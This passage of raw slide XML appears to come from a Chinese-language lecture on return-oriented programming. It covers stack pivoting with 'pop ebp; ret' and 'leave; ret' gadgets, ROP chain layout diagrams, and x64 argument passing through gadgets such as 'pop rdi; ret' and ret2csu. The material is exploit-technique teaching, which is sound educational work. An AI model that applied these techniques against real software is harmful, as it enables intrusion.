            <a:ext cx="3000400" cy="5392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esp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp = new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="矩形 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F13A0EB-FD3D-41ED-854D-A46B1D925F42}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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921"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1922" name="Shape 1922"/>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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1923" name="Shape 1923"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="763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pop ebp ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1924" name="Shape 1924"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="30004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pop ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1925" name="Shape 1925"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1923" idx="1"/>
            <a:endCxn id="1924" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1926" name="Shape 1926"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="1999087"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1927" name="Shape 1927"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="2203887"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1928" name="Shape 1928"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="30004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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1929" name="Shape 1929"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1928" idx="0"/>
            <a:endCxn id="1924" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="655600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1930" name="Shape 1930"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="20952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600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1931" name="Shape 1931"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="30004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leave ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1932" name="Shape 1932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="763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leave ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1933" name="Shape 1933"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1924" idx="0"/>
            <a:endCxn id="1931" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="1076400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1934" name="Shape 1934"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1932" idx="1"/>
            <a:endCxn id="1931" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="1770400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1935" name="Shape 1935"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="2904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36" name="Shape 1936"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="763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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1937" name="Shape 1937"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5392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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1938" name="Shape 1938"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1931" idx="0"/>
            <a:endCxn id="1939" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="948800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1940" name="Shape 1940"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="290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new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1939" name="Shape 1939"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="3000400" cy="539200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1941" name="Shape 1941"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="290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1942" name="Shape 1942"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="lef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1943" name="Shape 1943"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1942" idx="1"/>
            <a:endCxn id="1939" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="1161600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1944" name="Shape 1944"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="290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gadget 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1945" name="Shape 1945"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="290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gadget N</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1946" name="Shape 1946"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9988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new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1947" name="Shape 1947"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="425600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1948" name="Shape 1948"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164300" y="2605284"/>
            <a:ext cx="3000400" cy="5392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esp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp = new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="矩形 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59593DB-F687-4C77-883A-7DC7C6261727}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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996"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1997" name="Shape 1997"/>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dirty="0"/>
              <a:t>x64 ROP</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1998" name="Shape 1998"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1547813"/>
            <a:ext cx="11360150" cy="4556125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传递参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop rsi ; pop r15 ; ret  ;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setting rdx and rcx is hard, no trivial gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret2csu</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B78832B0-F74D-44EE-A795-5F95B7A1C824}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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003" name="Shape 2003"/>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dirty="0"/>
              <a:t>__libc_csu_init Gadgets for x64</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2004" name="Shape 2004"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip>
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="590533" y="1922933"/>
            <a:ext cx="11142867" cy="4317867"/>
          </a:xfrm>
